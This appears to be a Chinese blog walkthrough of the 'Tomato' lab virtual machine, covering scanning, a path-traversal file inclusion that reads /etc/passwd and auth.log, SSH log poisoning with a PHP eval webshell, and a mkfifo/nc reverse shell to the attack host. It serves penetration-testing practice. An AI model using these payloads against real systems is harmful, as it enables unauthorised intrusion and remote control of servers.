Tomato靶机~文件包含日志

寻找网站上传点并把 php 恶意代码文件改成 jpg 上传到网站上在本地包含引入恶意代码,当文件被引入后代码就被执行;

0x01信息收集

markdown 复制代码
# 环境准备:
Target IP:192.168.66.143
Attack IP:192.168.66.84
靶机目标:Tomato
// 这里需要注意靶机本身环境是桥接模式,我们需要给它换成NAT模式
markdown 复制代码
# 扫描网段
arp-sacn -l
markdown 复制代码
# 对靶机192.168.66.143端口扫描
nmap 192.168.66.143
markdown 复制代码
# 目录扫描
dirsearch -u "http://192.168.66.143"
dirb "http://192.168.66.143"

0x02漏洞发现

发现有文件上传的漏洞

markdown 复制代码
# 由于是linux系统,我们尝试看一下passwd文件
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd
markdown 复制代码
# 我们再看一下它的日志
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

0x03反弹shell

markdown 复制代码
# 我们尝试写一句话木马 ,进行反弹
ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.66.143
markdown 复制代码
# 使用中国蚁剑连接
markdown 复制代码
# 连接终端
markdown 复制代码
# 在kali上开个监听
nc -lvvp 9999 
markdown 复制代码
# 反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f
// IP是攻击机的

好小子,离成功又近一步!!!

相关推荐
一名优秀的码农28 分钟前
vulhub系列-59-Web-Machine-N72(超详细)
前端·安全·web安全·网络安全·网络攻击模型·安全威胁分析
一名优秀的码农1 小时前
vulhub系列-58-Funbox: Scriptkiddie(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
一名优秀的码农13 小时前
vulhub系列-57-Thoth Tech: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
汤愈韬15 小时前
路由反射器实验、环回接口建立IBGP邻居、更新源检查机制
网络·网络协议·网络安全·security
童话的守望者21 小时前
应急响应靶机练习-Web2
网络安全
huangwxiao1 天前
HTB——Oopsie
linux·网络安全·htb
Echo-J1 天前
WinDbg 双机调试(调试机为Windows11系统,被调试机为Windows7系统)
安全·网络安全·云计算·系统安全
67X1 天前
【论文写作】基于深度学习的异常检测方法(Deep learning-based anomaly detection methods)
深度学习·网络安全
菩提小狗1 天前
每日安全情报报告 · 2026-04-05
网络安全·漏洞·cve·安全情报·每日安全
oi..1 天前
Python POST请求练习-ua
开发语言·网络·经验分享·python·安全·web安全·网络安全